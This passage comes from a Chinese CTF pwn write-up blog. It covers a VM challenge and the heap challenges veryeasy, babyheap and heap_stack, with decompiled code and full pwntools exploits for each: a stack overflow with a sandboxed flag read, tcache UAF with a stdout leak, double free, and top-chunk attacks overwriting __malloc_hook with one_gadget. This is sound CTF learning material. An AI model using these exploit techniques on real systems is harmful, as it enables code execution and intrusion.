  0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 0x20, 0x2F, 0x20, 0x2F, 
  0x20, 0x20, 0x33, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x20, 0x7C, 
  0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x5F, 0x5F, 0x2F, 0x20, 0x7C, 0x20, 0x7C, 0x0A, 0x33, 0x40, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x48, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 0x7C, 
  0x20, 0x7C, 0x5F, 0x7C, 0x20, 0x7C, 0x20, 0x33, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x2F, 0x20, 
  0x2F, 0x20, 0x20, 0x7C, 0x20, 0x33, 0x08, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x7C, 
  0x5F, 0x5F, 0x5F, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x20, 0x7C, 
  0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x20, 0x20, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 0x33, 
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 
  0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x33, 0x28, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 0x2F, 
  0x20, 0x2F, 0x20, 0x20, 0x20, 0x33, 0x30, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x2F, 0x20, 0x2F, 
  0x20, 0x20, 0x20, 0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x20, 0x7C, 
  0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 
  0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 
  0x01, 0x11, 0x5C, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x2F, 0x20, 
  0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x2F, 0x5F, 0x2F, 0x20, 0x20, 0x20, 0x7C, 0x5F, 0x33, 0x08, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 
  0x5C, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x33, 0x10, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x20, 0x20, 
  0x7C, 0x5F, 0x7C, 0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x7C, 0x5F, 0x7C, 0x20, 
  0x20, 0x20, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 
  0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x5F, 0x5F, 0x5F, 0x2F, 0x20, 0x20, 0x20, 0x20, 0x33, 0x30, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x2F, 
  0x5F, 0x2F, 0x20, 0x20, 0x20, 0x20, 0x33, 0x38, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 
  0x7C, 0x5F, 0x7C, 0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x8F, 0x01, 0x88, 0xD2, 0xF7, 0xFF, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

接下来该写出汇编逻辑了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
jmp 0x3a5
sub rsp,0x100 //关键点
mov a0, 0x2323232323232323
mov [buf+0x0],a0
mov a0, 0x2323232323232323
mov [buf+0x8],a0
mov a0, 0x2323232323232323
mov [buf+0x10],a0
mov a0, 0x2323232323232323
mov [buf+0x18],a0
mov a0, 0x2323232323232323
mov [buf+0x20],a0
mov a0,0xa
mov [buf+0x28],a0
mov a0,[buf+0x0]
push a0
pop a1
mov a0,1
mov a2, 0x29
syscall 1 //write
mov a0, 0x2020202020202023
mov [buf+0x0],a0
mov a0, 0x6d6f636c65772020
mov [buf+0x8],a0
mov a0, 0x323032206f742065
mov [buf+0x10],a0
mov a0, 0x2046544341472030
mov [buf+0x18],a0
mov a0, 0x2320202020202020
mov [buf+0x20],a0
mov a0, 0xa
mov [buf+0x28],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x29
syscall 1 //write
mov a0, 0x7369687420202023
mov [buf+0x0],a0
mov a0, 0x656d206120736920
mov [buf+0x8],a0
mov a0, 0x7266206567617373
mov [buf+0x10],a0
mov a0, 0x616d206d76206d6f
mov [buf+0x18],a0
mov a0, 0x232020656e696863
mov [buf+0x20],a0
mov a0, 0xa
mov [buf+0x28],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x29
syscall 1 //write
mov a0, 0x2323232323232323
mov [buf+0x0],a0
mov a0, 0x2323232323232323
mov [buf+0x8],a0
mov a0, 0x2323232323232323
mov [buf+0x10],a0
mov a0, 0x2323232323232323
mov [buf+0x18],a0
mov a0, 0x2323232323232323
mov [buf+0x20],a0
mov a0, 0xa
mov [buf+0x28],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x29
syscall 1 //write
mov a0, 0x656d206c6c657423
mov [buf+0x0],a0
mov a0, 0x7369207461687720
mov [buf+0x8],a0
mov a0, 0x616e2072756f7920
mov [buf+0x10],a0
mov a0, 0x3a656d
mov [buf+0x18],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x1b
syscall 1 //write
mov a0, sp
push a0
pop a1
mov a0, 0x0
mov a2, 0x1000
syscall 0 //read
mov a0, sp
syscall 2 //puts
mov a0, 0x20746168772c6b6f
mov [buf+0x0],a0
mov a0, 0x7720756f79206f64
mov [buf+0x8],a0
mov a0, 0x73206f7420746e61
mov [buf+0x10],a0
mov a0, 0x3a7961
mov [buf+0x18],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x1b
syscall 1 //write
mov a0, sp
push a0
pop a1
mov a0, 0x0
mov a2, 0x1000
syscall 0 //read
mov a0, 0x657220492c776f4e
mov [buf+0x0],a0
mov a0, 0x6f79206569766563
mov [buf+0x8],a0
mov a0, 0x617373656d207275
mov [buf+0x10],a0
mov a0, 0xa7e6579622c6567
mov [buf+0x18],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x20
syscall 1 //write
pop256
ret

好了,要开始pwn的部分了

要注意这里的call,保存指针不是常规意义上的”压栈”,它rsp是增加的(同理ret的rsp是减的)

read 0x1000明显栈溢出,通过调试,理清楚结构

此时是系统调用write之前,

在此之前会有一个push操作,内容是[buf+0x00]

看一下栈情况

image-20200920185428434

可以看到多了一块地址,是指向内存数据区的,所以可以泄露出heap_base

由于程序开了沙盒所以要用orw

写出syscall的函数即可。

需要注意的点:

image-20200925220738694

其实系统调用也是虚拟系统调用,在这里,分别为0,1,2,3

构造调用函数时也并非常规意义的syscall,要理解虚拟指令集来自己构造

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pwn import *
#io=remote('124.70.153.199',8666)
io = process('./vmpwn')
libc=ELF('libc-2.23.so')
#context.log_level = 'debug'
io.recv()
pay='a'*0x100
io.send(pay)
io.recvuntil('a'*0x100)
elf_base=u64(io.recv(6)+'\x00\x00')-0x203851#leak elf_base
pay='b'*0xf0 + 'd'*0x10 + p64(elf_base+0x203020)#ret ip
io.send(pay)
io.recvuntil('tell me what is your name:')
pay='a'*0xf0
io.send(pay)
io.recvuntil('a'*0xf0)
heap_base=u64(io.recv(6)+'\x00\x00')#leak heap_base
success('heap_base:'+hex(heap_base))
# pause()
def call(a,b,c,ord):#def virtual syscall
	pay1='\x11'
 	pay1+=p64(a)
	pay1+='\x12'
 	pay1+=p64(b)
 	pay1+='\x13'
 	pay1+=p64(c)
 	pay1+='\x8f'
 	if ord==0:
 		pay1+='\x00'
 	if ord==1:
 		pay1+='\x01'
 	if ord==2:
 		pay1+='\x02'
 	return pay1

pay2=call(1,elf_base+0x2038E0,0x8,1)#  wrr  # sys_read
pay2+=call(0,elf_base+0x2038f8,0x8,0)# sys_free
pay2+=call(0,heap_base+0x2D18+0x110+87,0x1000,0)
pay=''
pay=pay.ljust(0x100,'\x00')+p64(heap_base+0x2D18+0x110)+'\x00'*8
pay+=pay2
io.send(pay)
libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['read']
libc.address=libc_base #leak libc_base
system_addr=libc.sym['system']
bin_sh_addr=libc.search('/bin/sh\x00').next()
io.send(p64(libc.sym['open']))
pay=''
pay+='\x11flag\x00\x00\x00\x00'
pay+='\x33'+'\x00'*8
pay+='\x20'+'\x00'*8
pay+='\x12'
pay+=p64(0)
pay+='\x13'
pay+=p64(0)
pay+='\x8f'
pay+='\x03'#free -> open
pay+=call(3,heap_base+0x2D18,0x30,0)#orw
pay+=call(1,heap_base+0x2D18,0x30,1)
pay+=call(0,heap_base+0x2D18,0x1000,0)+'\xff'
io.send(pay)
success('libc_base:'+hex(libc_base))
success('heap_base:'+hex(heap_base))
success('elf_base:'+hex(elf_base))
io.interactive()

在本地写个flag文件,成功~

image-20200925225109306

0x02 钓鱼城杯 veryeasy

第一次做glibc2.27,多了个tcache机制以及IOfile的利用,所以,,又得去学了

直接去撸源码

有一个坑点是Ubuntu尽量不要点升级,不知什么时候我的18.4已不是18.4了升到了19,所以tcache完善之后总是打不通,没办法恢复到了之前的快照才得以完成这道题

看下程序

image-20200927004436835

先申请十个堆块绕过检查

接着就是tcache的uaf漏洞,1/16概率

思路:

绕过if检查之后,free掉7个填满tcache,第八个会放入unsortedbin,修改fd为stdout1/16的概率,之后把stdout malloc出来改写一下就可以leak信息。获得libc基址后就可以算malloc_hook的地址。不过这题不能直接向malloc_hook中写入one_gadget,得利用realloc函数做中专来满足one_gadget的条件。

exp

注释掉的一部分是网上的原exp,但有些麻烦可以不采用,原理大概就是先申请到stdin的地址爆破出低第四位的地址,然后再修改到stdout处。

这里改一下直接改写stdout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!/usr/bin/python
#-*-coding:utf8-*-
from pwn import *
libc = ELF('./libc-2.27.so')
#context.log_level = 'debug'
def Add(index, size, content, p):
    p.sendlineafter('Your choice :', '1')
    p.sendlineafter('id:', str(index))
    p.sendlineafter('size:', str(size))
    p.sendafter('content:', content)

def Edit(index, content, p):
    p.sendlineafter('Your choice :', '2')
    p.sendlineafter('id:', str(index))
    p.sendafter('content:', content)

def Delete(index, p):
    p.sendlineafter('Your choice :', '3')
    p.sendlineafter('id:', str(index))

def pwn():
    p = process('./veryeasy')
    Add(0, 0x80, 'A'*0x10, p)
    Add(1, 0x80, 'A'*0x10, p)
    Add(2, 0x80, 'A'*0x10, p)
    Add(3, 0x80, 'A'*0x10, p)
    Add(4, 0x80, 'A'*0x10, p)
    Add(5, 0x80, 'A'*0x10, p)
    Add(6, 0x80, 'A'*0x10, p)
    Add(7, 0x80, 'A'*0x10, p)
    Add(8, 0x80, 'A'*0x10, p)
    Add(9, 0x80, 'A'*0x10, p)
    Delete(0, p)
    Delete(1, p)
    Delete(2, p)
    Delete(3, p)
    Delete(4, p)
    Delete(5, p)
    Delete(0, p)
    Delete(0, p)
    #Edit(0, '\x88\xfa', p)
    #Add(10, 0x80, 'A'*0x10, p)#0
    #Add(11, 0x80, 'A'*0x10, p)#fa88 ->try 1/16
    #tcache: fa88(fd)->x8d0
    #Delete(2, p)# 2->x8d0
    # 改写fd指针,使其指向stdout
    #Edit(2, '\x60\x07', p)
    #Add(12, 0x80, 'A'*0x10, p)
	Edit(0,'\x60\x07',p)
    Add(10,0x80,'A'*0x10,p)
    try:#_IO_2_1_stdout_
        Add(11, 0x80, p64(0xfbad1800) + p64(0)*3 + '\x00', p)
        #关键点,看源码理解
        gdb.attach(p)
        libc_base = u64(p.recvuntil('\x7f')[-6:] + '\x00\x00') - 0x3ed8b0
        info("libc_base ==> " + hex(libc_base))
        libc.address = libc_base
    except:
        p.close()
        return 0
    if (libc_base >> 40) != 0x7f:
        return 0

    malloc_hook = libc.symbols['__malloc_hook']
    info("malloc_hook ==> " + hex(malloc_hook))
    realloc = libc.symbols['__libc_realloc']
    malloc = libc.symbols['__libc_malloc']
    a = [0x4f365, 0x4f3c2, 0x10a45c]
    one_gadget = libc_base + a[2]

    Delete(0, p)
    Edit(0, p64(malloc_hook-0x8), p)
    Add(14, 0x80, 'A'*0x10, p)
    Add(15, 0x80,p64(one_gadget) + p64(realloc+0x6), p)
    p.sendlineafter('Your choice :', '1')
    p.sendlineafter('id:', '16')
    p.sendlineafter('size:', str(0x80))
    p.interactive()
    p.close()
    return 1

if __name__ == '__main__':
    while True:
        a = pwn()
        if a:
            break

reference:

IOFILE泄露libc

0x03 CUMTCTF2020 babyheap

这是很早做过的题稍微改了改放在了校赛

先查看一下保护,可改写got表。UAF+Double free

add函数

每次add都会malloc了两个堆:

s相当于指针数组,分别存放标志位、buf指针、message;

buf存放game message

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
int add()
{
  size_t size; // [rsp+0h] [rbp-20h]
  void *s; // [rsp+8h] [rbp-18h]
  void *buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  s = 0LL;
  buf = 0LL;
  LODWORD(size) = 0;
  if ( (unsigned int)count > 9 )
    return puts("Too much!!!");
  s = malloc(0x28uLL);
  memset(s, 0, 0x28uLL);
  puts("size of the game's name: ");
  if ( (unsigned int)__isoc99_scanf("%u", &size) == -1 )
    exit(-1);
  buf = malloc((unsigned int)size);
  if ( !buf )
  {
    puts("Error !!");
    exit(-1);
  }
  puts("game's name:");
  read(0, buf, (unsigned int)size);
  *((_QWORD *)s + 1) = buf;
  puts("game's message:");
  __isoc99_scanf("%23s", (char *)s + 16);
  *(_DWORD *)s = 1;
  for ( HIDWORD(size) = 0; HIDWORD(size) <= 9; ++HIDWORD(size) )
  {
    if ( !list[HIDWORD(size)] )
    {
      list[HIDWORD(size)] = s;
      break;
    }
  }
  ++count;
  return puts("Added!");
}

delete函数,存在uaf漏洞,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int del()
{
  int result; // eax
  unsigned int v1; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  if ( !count )
    return puts("Null!");
  puts("game's index:");
  __isoc99_scanf("%d", &v1);
  if ( v1 <= 9 && list[v1] )
  {
    *list[v1] = 0;
    free(*((void **)list[v1] + 1));
    result = puts("Deleted!");
  }
  else
  {
    puts("index error!");
    result = 0;
  }
  return result;
}

泄露main_arena+88的地址,从而计算libc基址,使用doublefree从而改写malloc_hook的地址,getshell。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import*
context.log_level = 'debug'
def menu(ch):
	p.sendlineafter('choice :',str(ch))
def new(size,name,content):
	menu(1)
	p.sendlineafter("game's name:",str(size))
	p.sendafter("game's name:",name)
	p.sendlineafter("game's message:",content)
def free(index):
	menu(3)
	p.sendlineafter('index:',str(index))
def show():
	menu(2)
p = process('./babyheap')
libc = ELF('./libc-2.23.so')
new(0x100,'1111','1111')
new(0x68,'1111','1111')
new(0x68,'1111','1111')
free(0)#unsortedbin
new(0xD0,'\x78','\x78')
show()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68
log.info('libc:\t' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
print hex(malloc_hook)
og = libc_base + 0xf1207
realloc = libc_base + libc.sym['realloc']
free(1)
free(2)
free(1)
new(0x68,p64(malloc_hook - 0x23),'2222')
new(0x68,'ld1ng','ld1ng')
new(0x68,'ld1ng','ld1ng')
new(0x68,'\x00'*(0x13-8) + p64(og) + p64(realloc + 4),'ld1ng')
menu(1)
p.interactive()

0x04 ciscn2020 pwn2

一道国赛题,pwnht学长赛后给我发了exp,今天才想起来看一下,不过学长有些地方写的不是很懂,所以根据思路改了改,现在起码自己能看懂了。

题目叫heap_stack,本以为会和栈有关其实不然

image-20200929161614624

像普通堆题一样,push和puuuuush相当于add,pop是增加可push的次数,show就是show

漏洞存在于push函数中,存在堆溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned __int64 push()
{
  __int64 nbytes; // ST00_8
  size_t size; // ST08_8
  void *buf; // ST10_8
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  if ( num <= 9 )
  {
    puts("size?");
    nbytes = sub_B49();
    size = nbytes & 0xFFF;//取后三个字节
    buf = malloc(size);
    puts("content?");
    read(0, buf, nbytes);//读入的大小未作限制
    printf("Malloc at  %p.\n", buf, nbytes, size);
    ptr[num++] = buf;
  }
  return __readfsqword(0x28u) ^ v4;
}

起码找到漏洞后在fix阶段还是有帮助的

利用方式为House of Orange,泄露出libc,利用puuuush可以申请大堆块的特点,讲堆块申请到malloc_hook处,修改为one_gadget之后触发漏洞即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/env python
from pwn import *
#context.log_level='debug'
def uu64(data):
	num = u64(data.ljust(8, b'\x00'))
	log.success("%#x" %(num))
	return num
def add(size,text):
	io.sendlineafter(">",str(1))
	io.sendlineafter("?",str(size))
	io.sendafter("?",text)
def add2(size,text):
	io.sendlineafter(">",str(2))
	io.sendlineafter("?",str(size))
	io.sendafter("?",text)
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
io=process('./heap_stack')
add(0x1018,p64(0x20)+p64(0xfe1)+p64(0x20)+p64(0x0fe1))#改topchunk大小
add(0xfff,'bbb')#HOO,unsortedbin
add(0xfb0,p8(0x78))
io.sendlineafter(">",str(4))#show
io.recv()
libc_addr=uu64(io.recv(6))
a= [0x45226,0x4527a,0xf0364,0xf1207]
libc_base=libc_addr-0x68-libc.sym['__malloc_hook']
#print hex(libc.sym['__malloc_hook'])
malloc_hook=libc_base+libc.sym['__malloc_hook']
one_gadget=libc_base+a[3]
print("libc_base="+hex(libc_base))
add(0xfe0-0x90-0x10,'a')

add(0x1000,'a'*0x10+p64(0x20)+p64(0xFFFFFFFFFFFFFfe1))#改topchunk
io.recvuntil("Malloc at  ")
heap_addr=int(io.recv(14),16)
offset=malloc_hook-(heap_addr+0x30)
add2(offset,'a')
add(0x20,p64(one_gadget))
# io.recvuntil('>',str(3))
# add(0x30,'a')
pause()
io.interactive()

临近下课终于成功了,,okok

image-20200929163303056

0x06 小结

还有一个题网上资料也比较少,十一补